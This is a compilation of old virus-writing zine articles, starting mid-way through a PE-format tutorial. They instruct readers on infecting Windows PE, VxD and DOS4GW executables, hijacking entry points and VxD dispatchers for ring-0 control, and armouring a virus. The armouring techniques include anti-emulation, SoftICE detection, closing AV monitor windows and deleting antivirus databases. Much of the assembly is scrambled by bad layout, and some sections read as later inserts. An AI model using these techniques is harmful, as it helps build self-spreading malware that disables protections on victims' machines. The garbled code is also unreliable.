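           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/*
 * Return the file offset of the "PE\0\0" magic, or -1 if the buffer does
 * not look like a PE file. (Hypothetical helper, for illustration only.)
 */
long long pe_header_offset(const uint8_t *file, size_t size)
{
    uint32_t off;

    if (size < 0x40 || file[0] != 'M' || file[1] != 'Z')
        return -1;                      /* no MZ header at the start */
    off = read_u32le(file + 0x3C);      /* dword pointer to the PE header */
    if (off > size || size - off < 4)
        return -1;                      /* pointer runs past the end of the file */
    if (read_u32le(file + off) != 0x00004550u)
        return -1;                      /* magic is not "PE\0\0" */
    return (long long)off;
}
```

The _IMAGE_FILE_HEADER starts 4 bytes after the returned offset, right behind the magic.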
In the headers i would like to point out some fields:

_IMAGE_FILE_HEADER
    Machine                 processor on which the file is able to run (I386 = 0x14c)
    NumberOfSections        the name says it all; for dummies: number of sections in the program

_IMAGE_OPTIONAL_HEADER
    SizeOfCode              size of all pages allocated for code
    SizeOfInitializedData   size of all pages allocated for data
    AddressOfEntryPoint     RVA of the entry point (relative to ImageBase)
    ImageBase               all the sections are mapped starting at this address
    SectionAlignment        alignment of the sections (I386 = 0x1000)
    FileAlignment           alignment of the file
    SizeOfImage             size in bytes including all headers, has to be a multiple of the object alignment (allocated for code and data)
    SizeOfHeaders           size of headers (including all section headers)
    CheckSum                checksum - the same as in DOS - ignored
    Subsystem               tells the OS whether it is a windowed or console application
    DataDirectory           array of structures containing RVAs and sizes of some important tables
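The alignment fields are easier to follow with the arithmetic written out. The sketch below assumes the alignment is a power of two (as 0x200 and 0x1000 are); align_up and is_aligned are illustrative names, not something taken from WINNT.H.

```c
#include <stdint.h>

/* Round value up to the next multiple of alignment.
 * Assumes alignment is a non-zero power of two (e.g. 0x200 or 0x1000). */
uint32_t align_up(uint32_t value, uint32_t alignment)
{
    return (value + alignment - 1) & ~(alignment - 1);
}

/* Non-zero if value is already a multiple of alignment
 * (the condition SizeOfImage has to satisfy for SectionAlignment). */
int is_aligned(uint32_t value, uint32_t alignment)
{
    return (value & (alignment - 1)) == 0;
}
```

For example, 0x1234 bytes of section data occupy align_up(0x1234, 0x1000) = 0x2000 bytes of address space with the I386 SectionAlignment.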
PE code and data are divided into sections. Each section has its description in the header. The main purpose of this is to tell the loader where in the address space the data should be stored, how big an area should be allocated and what attributes should be set for it. For example, a code section should start at 4000000h and should be read-only and executable. A special section attribute is SHARED. If a section is shared, all instances of the program have this section in common. It means that if one of them modifies something in the section, all instances can see it.
Some words of explanation about the RVA (Relative Virtual Address). All the complicated operations, e.g. relocation etc., are performed AFTER the file is mapped to memory. If we add the ImageBase to the RVA value, we get a pointer directly to the memory address where the desired piece of information is mapped. Without mapping the problem is much harder, because we need to search through all the sections and find the one the RVA points into (VirtualAddress <= RVA < VirtualAddress + VirtualSize), and the offset in the file can then be calculated as:

file_off = PointerToRawData + RVA - VirtualAddress

(PointerToRawData is the section's offset in the file, which is what "physical address" means here.)
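The section search just described can be sketched in C as follows. The struct holds only the three IMAGE_SECTION_HEADER fields the lookup needs; WINNT.H names the file position of a section PointerToRawData, and the struct and function names below are made up for this example. The sketch treats an RVA as convertible only when it falls inside the section's raw data on disk, which is an assumption of this illustration.

```c
#include <stddef.h>
#include <stdint.h>

/* Subset of IMAGE_SECTION_HEADER used for the lookup (illustrative type). */
struct section {
    uint32_t virtual_address;     /* VirtualAddress: RVA of the section start */
    uint32_t pointer_to_raw_data; /* PointerToRawData: offset of the data in the file */
    uint32_t size_of_raw_data;    /* SizeOfRawData: bytes actually stored in the file */
};

/*
 * Convert an RVA to a file offset. Returns 0 and stores the offset in
 * *file_off on success, or -1 if no section's raw data covers the RVA
 * (for example when it points into uninitialised data).
 */
int rva_to_file_offset(const struct section *s, size_t count,
                       uint32_t rva, uint32_t *file_off)
{
    size_t i;

    for (i = 0; i < count; i++) {
        uint32_t delta;

        if (rva < s[i].virtual_address)
            continue;                           /* RVA lies before this section */
        delta = rva - s[i].virtual_address;
        if (delta < s[i].size_of_raw_data) {
            *file_off = s[i].pointer_to_raw_data + delta;
            return 0;
        }
    }
    return -1;
}
```

Once the file is mapped by the loader none of this is needed: the pointer is simply ImageBase + RVA.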
And now there are only three problems to solve 1. where should we store virus body 2. how to make our fine virus the supreme commander in the system (aka we_need_to_be_first_on_the_draw) 3. how to call API functions
1. Where to store the virus body Before we will go any further, we should notice, that none of us known implementation of Window$ that checks if we execute the code in sections which is declared as data (cool enough ... :-P). This is the fact all the viruses (and packers as well) heavy relies on. As for the storage of the body, i saw till now 3 different strategies. Common strategy is based on the extending the last section. In such a case is "conditio sinne qua non" basic condition the section should be writeable in the section attributes (Intel platform could check it). As for the implementation of this method, it easy as it could only be, but for resident viruses we can got in to the trouble.... Physical data in the section can be followed by uninitialized data, which can be changed by the program. This means our fine piece of code may become fucked up. Therefore whole viral body should be moved elsewhere. Another method is to create new section in the file and copy virus body there. This approach has one major disadvantage (which is nearly impossible to solve) - nonstandard section name could arise a suspiction of something not very pleasant going on, not speaking of the situation header is to small for adding another section. Contrary, advantage is we have our section just for us, nobody can overwrite the virus. As for the implementation, trivial again in comparision with before mentioned method we have one aditional task - we need to know, where last section ends. One of the non-standart method is the one used by CIH virus. This is all about the using the free space in
sectors which are aligned to FileAlignment value (0x200 by default). This technique is very clever (invented by some as Germans use to say "Klugscheisser") as we get bonus in some cases there is no increase in file lenght plus the virus is harder to clean. This method will not be in the focus of this article as for the larges viruses in not suitable. Main disadvantage of the first two methods is the code runs in the last section. And if some emulator get here, there are just and only 3 options left. 1. virus 2. packer 3. some anti-whatever envelope But solution is up to you - probably best way would be to use CIH approach and place entry point in the first sections.
2. we_need_to_be_first_on_the_draw how to make our fine virus the supreme commander in the system Most trivial solution is to modify AdressOfEntryPoint in the PE header to point to start of added (viral) code. In plain words put there RVA of virus entry point. Nothing more nothing less. More rafined methods are e.g. to hook some import (let's say CreateFileA or whatevever is on 100% callled in every proggy) or even hook export in DLL's so every call to DLL goes through virus. This approach is not trivial as complicated search in structures is required. Some of the options will be covered in next section.
3. How to call API functions This is the key problem of all the viruses. This problem could be transformed in the question - what API calls i need to get pointer to whatever API function? Answer is GetModuleHandle and GetProcAdress. If we have pointers to this functions we can get pointer to any function we want. Both of this two API calls are exported from kernel32.dll. As i haven't seen any application not importing something from this important system module we can perform test if the file we want to infect imports from kernel32.dll. Then we have to search in import table and look for this two functions. If we find them, the file is suitable target for the infection. Imports in PE file work that way they point to some dword and in this dword will be set address of imported function. All the requests in the file for specific API function will look like call dword ptr [dddd]
Advantage for us is there is no problem to hook function and at each call to this function do "something". To the import table we will get throug DataDirectory (i think index 1). This should point to the array of structures IMAGE_IMPORT_DESCRIPTOR. Last element of the array should have Characteristics set to 0. Name is RVA pointer to the name of the module from which the import is performed. OriginalFirstThunk points to array of type IMAGE_THUNK_DATA from which we can get the name of the function. Let's saz the function has index i. Then pointer to function f in imports will be i-th element of the dword array, to which
FirstThunk points. Last element of the array of type IMAGE_THUNK_DATA is zero. I recommend to see it all in HIEW and then in debugger search where the desired functions are.

//
// Import Format
//
typedef struct _IMAGE_IMPORT_BY_NAME {
    WORD Hint;
    BYTE Name[1];
} IMAGE_IMPORT_BY_NAME, *PIMAGE_IMPORT_BY_NAME;

typedef struct _IMAGE_THUNK_DATA {
    union {
        PBYTE ForwarderString;
        PDWORD Function;
        DWORD Ordinal;
        PIMAGE_IMPORT_BY_NAME AddressOfData;
    } u1;
} IMAGE_THUNK_DATA;
typedef IMAGE_THUNK_DATA * PIMAGE_THUNK_DATA;

#define IMAGE_ORDINAL_FLAG 0x80000000
#define IMAGE_SNAP_BY_ORDINAL(Ordinal) ((Ordinal & IMAGE_ORDINAL_FLAG) != 0)
#define IMAGE_ORDINAL(Ordinal) (Ordinal & 0xffff)

typedef struct _IMAGE_IMPORT_DESCRIPTOR {
    union {
        DWORD Characteristics;                  // 0 for terminating null import descriptor
        PIMAGE_THUNK_DATA OriginalFirstThunk;   // RVA to original unbound IAT
    };
    DWORD TimeDateStamp;                        // 0 if not bound,
                                                // -1 if bound, and real date\time stamp
                                                // in IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT (new BIND)
                                                // O.W. date/time stamp of DLL bound to (Old BIND)
    DWORD ForwarderChain;                       // -1 if no forwarders
    DWORD Name;
    PIMAGE_THUNK_DATA FirstThunk;               // RVA to IAT (if bound this IAT has actual addresses)
} IMAGE_IMPORT_DESCRIPTOR;
typedef IMAGE_IMPORT_DESCRIPTOR UNALIGNED *PIMAGE_IMPORT_DESCRIPTOR;
As I mentioned before, there is no need to do all fixups while file is being infected. It is either possible to do it after file is loaded. Just find old 'MZ' header and trace file structure. (What is nice, rva are almost valid pointers so you need just to add base address and you can follow any structure). After you find first export to Kernel32 use the same method to find start of kernel32 and then follow export table ... As for the exports it's much easier, but i had no time for experiments and will let this problem open. If you want know more, look for it in some PE doxes (RTFM).
I would like to point to the fact the article has been written more or less using just and only my memory (my degenerated gray cell mass), has not been subject to verification and thus i can't guarantee any fact presented here is true :)))))) If you are interested in the problem, you should see it again elsewhere, in some more reliable refference. And finally, some warm closing words. If the fucking proggy doesn't work and you poor guy did check it all over and over about 10 times, try to find that bug in the Windows loader. Navrhar
In this article I will announce my aproach to infection of strange platforms as are Windows VxD or dos DOS4GW. Both platforms are running under similar environment - in FLAT memory model both are extended 32-bit so this is the reason why I have dealed with both of them.
So let's start In both cases we will infect host with small loader, that will load and execute main part of virii. This strategy is nice because there is no code executed in last section and so on. LE (as I will call LX too, because there are similar or even the same), is intel friendly, because it uses 4096 bytes long pages. Each section is aligned to page. This means, that in average case 2000 bytes in code section is unused and free. Nice, isn't it :-). This wasting of space we will use to insert our short "loader" that will load other stuff from end of file (if you want, it may be placed elsewhere, or you may groove last section i have a feeling that there may be debug info or other shit, so not so fast) and execute it. Because of flat model and you never knows where will you be loaded, this piece of code must be self-relocating. Enough of talking, go on. VxD starts as regular dos-executable with pointer to next header at 3Ch (just like in PE). With DOS4GW it is a bit difficult. DOS4GW starts with some stupid stub, that will load main LE/LX executable. I don't deal with this too much, I just looked at some Dos4GW and wrote this part of code readfile is macro as follows: readfile ofs, size, buf reads at offset ofs+file_base+objectr size bytes to buffer buf ; check if WATCOM ? loader mov file_base, 0 mov objectr, 0 cmp jne
; base of start of LX (to skip stubs)
byte ptr infmode, INF_DOS4 short continue_vxd
readfile 0h 16 le_header cmp word ptr le_header, 'ZM' je short ok001 cmp word ptr le_header, 'MZ' jne novalidvxd
; check exe signature
ok001: movzx dec shl movzx add
esi, esi esi, ebx, esi,
word ptr [le_header+4] 9 word ptr [le_header+2] ebx
readfile esi 24h le_header cmp word ptr [le_header], 5742h ; some kind of executable? jne short continue_vxd add esi, dword ptr [le_header+20h] mov file_base, esi continue_vxd:
now file_base should point to regular DOS 'MZ' exacutable with dword at 3ch set as it should have. So just get start of LE header like this and check some formalities: readfile 3ch 4 le_seek
; read le header readfile le_seek 100h le_header ; check 4 signature cmp word ptr le_header, 'EL' jne nole ; check if pages are 4096 bytes long cmp dword ptr le_header+28h, 1000h jne nole ; ...
Now we have to understand some LE specific stuff. At first LE is fragmented to sections (similary like PE). Sections are called Objects here. Objects are in header and there is usually not enough space to create your own object. This code will compute offset of eax-th section descriptor: ; compute object descriptor offset in file (relative to file_base) ; eax - object num getobjptr: shl eax, 3 lea eax, [eax+2*eax-24] ; first object is num 1 add eax, dword ptr le_header+40h add eax, leseek ret
Object descriptor structure is as follows: object_desc label byte ; object info record virtsize dd 0 ; object virtual size virtbase dd 0 ; object virtual base flags dd 0 ; flags pageindex dd 0 ; page index ... pageen3z dd 0 ; num of page entriez dd 0 ; alignment? object_desc_len = $-object_desc
This offset of object in file should be computed as objectr = *(dword *)[le_header+80h] + pageindex<<12
Object in file is (of course) not fragmented. It starts at objectr and ends at (objectr+pageen3z<<12-1) The second new entity in LE are entries. This is some kind of exports in PE. This is how to assume offset of eax-th entry: (objectr will point to start of entry). ; this will assume entry eax (read and write will be relative to this) ; assume entry eax - entry num le_assume_entry: ; relative to header mov edx, leseek mov objectr, edx ; get add lea add
entry offset in file eax, eax eax, [eax+4*eax+1] ; * 10 + 1 eax, dword ptr le_header[5ch]
; read entry descriptor mov ecx, 10 lea edx, buffer call rdfile ; get object num movzx eax, word ptr buffer+1 ; assume this object call le_assume_object ; add relative entry offset mov eax, dword ptr buffer+4 add objectr, eax mov objoffset, eax ret
And the last thing you need to know about are relocations. Because code may be stored anywhere between 0-4GB, each access to memory has to be relocated. (The only one exceptions are jumps which are relative to itself). Because of this LE has very complex structure of relocation (much more complicated than PE). Because of complex structure of relocations, many compilers are seting values to be relocated to 0. If you really want to deal with this i will advise you to some documentation. But if you don't this is a fragment of code that scans for relocation: This is code i wrote to parse relocation table and to find some relocation that relocates eax: I wrote it so far ago so i will be not trying to explan this - just see documentation (as far as i know there is no good documentation :-( ). ; ; ; ;
finds fixup for eax in fixup table that relocates eax sets fixupptr = ptr to entry in fixup table (relative to filestart) parses whole fixup table in order to find an entry and create relo map eax = pointer to find
find_fixup: mov xor mov mov mov
edi, eax eax, eax fixupptr, eax fix32, al fix_important, al
; allocate table for relos mov eax, RELO_TABLE_SIZE/8 mod_call md_alloc mov relo_map_ptr, eax ; make whole area unusable push edi mov edi, eax xor dec mov rep
eax, eax eax ecx, RELO_TABLE_SIZE/8/4 stosd
pop
edi
; walk across all objects and process some of them xor inc @@loop_section: push
eax, eax eax eax
; eax = object ptr call le_assume_object mov mov
eax, leseek objectr, eax
test jnz
flags, 10100000b @@skip_this_object
mov mov
eax, objpage temp_base, eax
; get size of object mov ecx, pageen3z push ecx shl ecx, 12 call zero_out_block pop mov
ecx eax, pageindex
; base to LE filestart
; walk through page map and fixup entries @@process_page: push
eax ecx
; load item ; 4 bytes long entry dec eax shl eax, 2 add eax, dword ptr [LE_header +48h] mov lea call
ecx, size page_map_table_entry edx, page_desc rdfile
; doesn't work on VxD LE files ; cmp page_desc.page_type, 0 ; je @@hardcopy_no_work movzx xchg
eax, page_desc.fixup_index al, ah
; now get ptr to relocation by index push eax dec eax shl eax, 2 add eax, dword ptr [LE_header+68h] lea xor mov call
edx, fixup_cur ecx, ecx cl, 8 rdfile ; in this table is one entry with no meaning, just ; identifying end
pop
eax
mov mov sub
ecx, fixuptrnext eax, fixup_cur ecx, eax
add
eax, dword ptr [LE_header+6ch]
; eax points to fixup table ; process ecx bytes from fixup record add ecx, eax sub
edi, temp_base
@@loop_this_page: cmp eax, ecx jae @@just_done @@cont_relo: push
eax ecx
; load relocation in buffer lea edx, buffer mov ecx, 20h call rdfile ; process relocation lea esi, buffer xor eax, eax ; get first byte lodsw mov ecx, eax ; test if single test cl, 20h jnz @@multiple1 lodsw call
set_eax
cmp sete
eax, edi fix_important
jmp
@@not_multi
@@multiple1: lodsb mov
; count dl, al
@@not_multi: ; check mov and cmp je cmp je ; ;
for unknown relocation eax, ecx ax, 0001100001111b ax, 7h @@type_78 ax, 8h @@type_78
marker 'unknown relocation' raise_x INF_FILE_FATAL
@@type_78: ; assume object is 8 bit lodsb ; if important object store ptr and size cmp fix_important, 1 jne @@no_important mov sub mov add mov add xor
fixupptr, esi fixupptr, offset cs:buffer eax, dword ptr [esp+4] fixupptr, eax eax, objectr fixupptr, eax eax, eax
test setnz
ch, 10h fix32
@@no_important: lodsw test ch, 10h ; check if 32-bit jz @@fixed lodsw @@fixed:
;
test jz
cl, 20h @@nomultiple2
mov test jz
@@prefix, 66h cl, 10h @@no_prefix_chg
marker '32-bit repeated relo' mov @@prefix, 90h
@@no_prefix_chg: movzx ecx, dl @@enz: @@prefix db 66h, 0adh call
set_eax
loop
@@enz
; lodsw
@@nomultiple2: pop
ecx eax
sub add
esi, offset cs:buffer eax, esi
jmp @@just_done: add ; done
@@loop_this_page edi, temp_base
@@hardcopy_no_work: pop ecx eax inc
eax
add
temp_base, 1000h
dec jnz
ecx @@process_page
@@skip_this_object: pop inc cmp jbe
eax eax eax, dword ptr [le_header+44h] @@loop_section
; cnt of objects
ret set_eax:
@@err:
push add shr
eax ebx eax, temp_base eax, RELO_TABLE_BLOCK_SIZE
cmp ja
eax, RELO_TABLE_UPPER_LIMIT @@err
mov
ebx, relo_map_ptr
btr
dword ptr [ebx], eax
pop ebx eax ret ;marker 'RELO_TABLE_EXCEED' pop ebx eax ret
zero_out_block: push eax ebx ecx mov
ebx, relo_map_ptr
shr
eax, RELO_TABLE_BLOCK_SIZE
@@zero_out_next: btr dword ptr [ebx], eax inc eax cmp eax, RELO_TABLE_UPPER_LIMIT jae @@cln_exceed sub ecx, (1 shl RELO_TABLE_BLOCK_SIZE) jb @@zero_out_next @@cln_exceed: pop ecx ebx eax ret
This is way i proceed VxDs: 1. some check mov or jne
eax, dword ptr le_header+18h ; entry object eax, dword ptr le_header+1ch ; entry offset novxd ; seems to be a real executable ! ; UPDATE
2. check if there is enough space in code section. i assume code section is section 1 (first section). 3. assume DDB entry - this is entry that describes VxD in Windows this contains pointer to control dispatcher. This is a functions that handles various events, and this is how we get to turn. Pointer to dispatcher is first 4-bytes of DDB 4. find fixup for dispatcher
5. write your code to end of code section, groove this section and change fixup to start of your code. be sure that after end of your loader you return control to previous dispatcher. Note: the value of relocation is more trustable than value in DDB
And what your dispatcher should do: 1. test for special event (number in eax). I used 2 (Init_Complete) that is sent to all VxDs after init of windows is complete. 2. check wether there is anybody resident (because you are at VxD level, you have full control of computer, you don't need to have multiple instances) 3. load your dropper from end of file (file name will be stored by infection - vxd should not be moved) 4. run your code
Some hints on ring 0 Of course after your code is running in the memory you may do anything what may a regular VxD do. There are no restrictions. At first because interface for VxD calls. Every VxD call looks like this: db 0cdh, 20h, xx, xx, xx, xx
where xx xx xx xx is number of service. It means there are no imports and exports needed. After this code is executed it is patched to call dword ptr [addr]
where addr is pointer to some internal table where is stored pointer to function. You must agree this was designed for viruses to get control over service. This may be useful, when you want to check wether you are resident or not. About hooking filesystem just see IFS_Mgr_InstallFileSystemApiHook And for last dont forget in_resident flag and mutexes or other synchronizing stuff. That's all about this .... happy coding
And now some few words about DOS4GW LE: In DOS4GW you may relay to DPMI (that should be supportet quite good) under any platform it works. 1. get entry point at le_header+1ch is offset (relative to start of section and at le_header+18h is object no 2. groove object (if enough space) and store loader at end of section 3. set new entry offset You don't need to deal with fixupps and other shit. Your loader will do this: 1. start with short jump followed by "WATCOM" if this is not loader will say something like "Invalid executable" and this is way how to test wether executable is compiled by WATCOM too 2. load code from end of file and run it (environment segment is at ES:2C like usually, you may use dos
services (int 21h) and DPMI (int 31h) - that is all you need) As you see DOS4GW is pretty easy target ...
What to say at the end? ... do your best!
Disclamer The followin' document is an education purpose only. Author isn't responsible for any misuse of the things written in this document.
Foreword Every good virus should be armoured. Armoured means have some features, by which will be harder to detect, harder to emulate, harder to disassemble, harder to trace, harder to monitor or harder to understand. I will discuss here all techniques, which has some special meaning in virus programming.
Introduction Actually, there r many ways, how to protect virus against AVs and Averz under so weird interface as Win32 is. Something is often used, something isn't. Here is a "short" list of techniques, which I will describe: anti-emulator anti-heuristics anti-analysis (anti-disasm) anti-debug anti-monitor anti-antivirus (retro) anti-bait
Anti-Emulator - fool AVs by some tricks By heuristic analysis, AVs SHOULD be find every virus, even unknown one. It worx like coder, which debugging some program. Heuristic scanner passes thru the code and looking for some suspicious code. It may be procedure for searching APIs, procedure to jump to ring-0, working with wildcards of executable files, opening executable file for write etc... Heuristic analysis is very good idea, nevertheless, not very well realised. AVs have many bugs and "sometimes", they can't recognize viral code. Some heuristic scanners have problems with undocumented opcodes, another scanners can't work with selectors and almost every scanner can't handle stack properly. Here r the techniques, which r used by many viruses and which still seems to be problem for heuristic scanners: Use selectors and stack mov eax, ds push eax pop ds mov ebx, ds cmp eax, ebx jne emul_present
or
;load DS ;some ;stuff ;load DS again ;compare selectors ;if not same, quit
mov edx, esp push cs pop eax cmp esp, edx jne emul_present
;load ESP ;some ;stuff ;compare stack pointer ;quit if not equal
Use RETF instruction push cs push offset label retf
;store CS ;store address of procedure ;and go there
Use undocumented opcodes db db
0D6h 0F1h
;SALC ;BPICE
And more...
Anti-Heuristics - fool AVs by advanced technologies Anti-Emulator uses holes in heuristic scanners. But at Anti-Heuristic case, we uses more advanced technology to fool AVs. If AVerz were able to "patch" holes in AVs, here it won't be so easy. They will need to rebuild their emulator and add new features (e.g. support of SEH). In DOS-viruses beginnings, viruses tried to hook Int 0 (divide by zero) and then divided register by zero. This caused, that execution was redirected to another place. AVerz had to rebuild their heuristic analysis to support hooking of interrupt vectors. This is perfect example of anti-heuristic technology. Next good example is poly-layered polymorphic decryptor. Time didn't chang so much and we use similar techniques to cause AVs to support newer and newer techs. Here r some examples: Use Structured Exception Handling @SEH_SetupFrame <seh_proc> xchg [edx], eax ... seh_proc: @SEH_RemoveFrame ...
;setup SEH handler to seh_proc ;cause GP fault ;garbage code ;remove SEH handler ;code continue here
Use threads and fibers Use pentium+, copro, MMX, 3DNow! opcodes Implement metamorphism to your virus Implement mid-infection and EPO (EntryPoint Obscuring) techniques Redirect code to another place by callbacks And so on... Some coderz call this technique as anti-emulator and previous as anti-heuristic. I don't know, which expresion is right (nobody knows :D) and I don't care. I think, that previous stuff was clear...
Anti-Analysis - fool disassemblers by some tricks Good virus should use some tricks, by which some curious ppl (such as AVers) won't be able to analyse it much easy. Really, there ain't anything easier for AVer than open IDA or Sourcer and see whole code as it was original source. Static analysis is very frequently used to analyse virus, don't forget it. Those tricks r still same and some of them r also used as Anti-Debugging technique.
Encrypt/cipher your virus as much as possible Don't code generic delta offset stuff, rather use: call label gdelta: db 0b8h label: pop ebp ... mov eax, [ebp + variable - gdelta]
;MOV opcode ;get delta offset ;next code ;example of handling EBP
Use jump into instructions opcd:
jmp opcd+1 mov eax, 0fcebfa90h
;jump into instruction ;NOP, CLI, infinite loop
Use prefixes (similar as in delta_offset example) proc1: proc2:
movzx ecx, word ptr [edi+4] ret db 0b8h mov eax, [edi+3ch] ret
;some code ;quit from procedure ;prefix (MOV EAX, ...) ;some code ;quit from procedure
Patch dynamic code at run-time (this can be also called as anti-heuristic if u will patch code in some hidden procedure, such as in thread etc...) patch: label:
call label ... jmp shit ... mov [patch], 90909090h ret
;some garbage code ;... ;normal code ;overwrite garbage with NOPs ;and quit from procedure
Anti-Debug - harder to analyse In previous examples we tried to fool machines - emulators and disassemblers. But now, we will try to fool AVerz, and that's very hard. AVerz aren't dumb (mmm, ofcoz there r some exceptions :D), so it is very important to make analysis of your virus harder. As much as possible. If virus cannot be analysed by disassembler, AVerz uses debuggers. Debuggers r easily detectable (Win32 interface allows it to us), but their detection mechanism shouldn't be very visible (AVerz can simply jump over the code). Use Win98/NT API to detect API level debugger - IsDebuggerPresent call IsDebuggerPresent xchg eax, ecx jecxz debugger_not_present
;call API ;result to ECX ;if ZERO, debugger not present
Check context of debugger mov ecx, fs:[20h] jecxz debugger_not_present
;load context of debugger ;if ZERO, debugger not present
Use Structured Exception Handling (see Anti-Heuristics) Use VxD service (Ring-0 only) to detect drivers in memory - Get_DDB mov eax, 202h VxDCall Get_DDB xchg eax, ecx jecxz sice_not_present
;SoftICE ID number ;call service ;result to ECX ;SoftICE not present
Use Win32 compatible way to detect drivers in memory - CreateFileA xor eax, eax push eax push 4000000h push eax push eax
;EAX=0 ;parameters ;for ;CreateFileA ;API
sice ;sice
push eax push eax push offset sice call CreateFileA inc eax je sice_not_present dec eax push eax call CloseHandle ... db '\\.\SICE',0 db '\\.\NTICE',0
;function ;... ;name of driver ;open driver ;is EAX==0? ;yeah, SoftICE is not present ;no, ;close its handle ;... ;and make some action ;SICE driver under Win9X ;SICE driver under WinNT
Play with debug registers (Ring-0 only) mov eax, '****' mov dr0, eax
;set already_infected mark ;to dr0
Calculate CRC32 and check it at virus start. It prevents from inserting breakpoints to code. Play with paging and SMM mode (see XiNE#4)
Anti-Monitor - killing watch-dogs Resident shields (monitors) r resident programs used to catch viruses. Monitors r activated, when executable files (usually) r opened, closed, executed, etc... Virus can be cought by monitor not only when infected file is being executing, but also when file is being copying. This on-line virus security is very efficent and many stupid users have installed some monitor. That's a problem. If monitor is installed as standard Win32 application in memory, it won't be big problem to get rid of that. Bad stuff is that this code doesn't work on AVs, which use special driver (VxD, WDM, ...) to control file access. Firstly we have to find window, which will we close. We will use FindWindowA API: wAVP
db 'AVP Monitor',0 ... mov eax, offset wAVP push eax cdq push edx call FindWindowA xchg eax, ecx jecxz quit
;window title ;window title ;push parameter ;EDX=0 ;window class - NULL ;find window ;swap EAX with ECX ;if ECX=0, quit
If AVP monitor window exists, we have window handle in EAX register. Otherwise, EAX is NULL. We will use that handle to send close message: push push push push call
edx edx 12h ecx PostMessageA
;NULL parameter ;NULL parameter ;WM_QUIT message ;window handle ;send message!
Geee, and AVP monitor is away! I also tested it with NODICE and it also worked. U can close another monitors, if u know titles of their windows.
Anti-Antivirus - destroy your enemy! If u wanna be sure, that stupid user won't find your virus, then correct that "problem" on AV side - erase or modify AV crc files and AV databases. Here r the most important files, which should be erased (mm, but don't forget that after u delete viral database, AV won't run) or in better case - only modified (e.g. delete virus from database):
*.AVC AVP.CRC *.VDB NOD32.000 ANTI-VIR.DAT CHKLIST.MS
- AVP viral database - AVP crc file - DrWeb viral database - NODICE viral database - TBAV crc file - MSAV crc file
+ some other old AV crc files
Anti-Bait - don't infect AV files Baits r mostly silly do-nothing programs and the only one purpose of their existency is to be infected by virus. That program can be easily analysed, easier than winword.exe, for example. And becoz we wanna make job to AVs as hard as possible, we r tryin' to not infect those shitty programs. Baits r usualy named as 00000000.EXE, 00000001.EXE, 00000002.EXE, etc. The first advice is don't infect files with digits in its name. But take care! Many normal programs has digits in its name, such as winrar95.exe or wincmd32.exe. So, if u don't wanna infect baits, but wanna infect standard applications, check, if filename contains digits at all 4, 6 or 8 positions. How easy...X-D
Closin' I hope this article will help u with coding under Win32 and u will find it useful. If u didn't understand everything, then read it again or cotact your netwerk supervisor :)). Don't forget to use some techniques from this article to be sure your virus will be better than average. Benny / 29A, 1999
Disclaimer
The followin' document is for educational purposes only. Author isn't responsible for any misuse of the things written in this document.
Foreword Threads r relatively new, but very useful and very perspective feature/tech used by some new Win9X/NT viruses. This article describes everything important about threads. Becoz I wrote many multithreaded viruses and actually I'm coding new one, I decided to write this. Everything, what is described here I researched - so, be tolerant to this - this article ain't for lamerz and I expect, u will research a bit on it and won't only rewriting existing code. This is my third article about threads. If u would like to read my first articles, then u have to wait for 29A#4 releasion (there r explained more details with more examples). Be patient and promise me u will read it :)
Introduction - why threads?
In my opinion, knowing threads is a must. If someone doesn't know threads, then he doesn't know Win32. That's a shame - many coders who write for Win32 don't know threads, although they have many advantages. I think it is the same kind of "kewl and useful technology" as polymorphism was. Well, here comes the main question - what is a thread? It is hard to explain to someone who doesn't know what processes r. Ok, then, what is a process?
Processes - definition
Process is defined as one instance of a running program. Example: u have one program - calculator. If u have three calculators running, u still have one program, but three running processes. Unlike in Win16, a process in Win32 is passive. Process can only own something - 4GB private address space, code, data, handles, allocated memory, kernel objects and such like. Everything allocated by the process or by the system on its behalf is automatically deallocated after the process quits. Process itself can't execute code - that is the job of its threads.
Threads - definition
Thread is a kernel object and is owned by a process. Thread is what executes code. Where a Win16 operating system was switching (committing processor time) between tasks (processes), a Win32 operating system is switching between threads. Process can create as many threads as it wants (blah, it's limited by memory and DWORD capacity :D). Imagine this situation: u have executed one instance of Calculator and one of WinWord. Calculator has only one thread and WinWord has five threads. In that case, operating system will commit processor time "in parallel" to six threads (depending on set priorities) - Win16 could switch only between processes and there were no threads. Threads r very often used in Win32. For example, if u wanna print something from some editor, the editor will create a new thread which will service printing and u will still be able to edit text - one thread for editing, second thread for printing. Big advantage is that all threads r scheduled by operating system. All u need is to synchronize them - and that's the most difficult part. When a new process is created, the system will by default create its first thread, also called "primary thread". Remember it!
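The editor/printing situation described above can be sketched in a few lines. This is only an illustration in Python (its threading module is used here as a portable stand-in, it is not the Win32 API), and the names run_editor_with_printing and print_job r made up for this sketch. The primary thread keeps "editing" while a second thread "prints", and the operating system schedules both.

```python
import threading
import time


def run_editor_with_printing(document):
    """Primary thread 'edits' while a second thread 'prints' the document."""
    printed = []

    def print_job(pages):
        # Worker thread: pretend to print the document page by page.
        for page in pages:
            time.sleep(0.01)  # simulate a slow printer
            printed.append("printed " + page)

    printer = threading.Thread(target=print_job, args=(document,))
    printer.start()  # from now on the scheduler runs both threads

    # The primary thread is not blocked by printing and keeps working.
    edits = ["edit %d" % i for i in range(3)]

    printer.join()  # wait until the printing thread terminates
    return edits, printed
```

Only the printing thread ever writes to the printed list, and the primary thread reads it only after join, so no extra synchronization is needed in this small case.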
Using threads under Win32 environment Here I will talk about Win32 compatible way of using threads.
1. Theory
Coding threads for Win32 seems easy. In fact, it is easy, but u must know some system structures and characteristics. If u create threads with the following API, your code should work on all Win32 platformz. Before we talk about creating threads, u should know some important things. Every thread owns its context structure and its stack.
Context structure contains all registers. Every time the system switches to another thread, it saves the registers of the current thread to its context structure and restores the registers of the next thread from its structure. Context structure is the only processor-dependent structure in all of Win32. Every thread also has its own stack allocated in the 4GB address space of its process. Default size of stack is 1MB.
Thread can be created by CreateThread API function:
Syntax:
HANDLE CreateThread (LPSECURITY_ATTRIBUTES lpsa, DWORD cbStack, LPTHREAD_START_ROUTINE lpStartAddr, LPVOID lpvTParam, DWORD fdwCreate, LPDWORD lpThreadID);
Parameters:
a) lpsa: Pointer to SECURITY_ATTRIBUTES structure. For default security attributes use NULL value.
b) cbStack: Size of stack in bytes. Use 0 for default stack = 1MB.
c) lpStartAddr: Address of thread function.
d) lpvTParam: 32bit parameter which will be passed to thread.
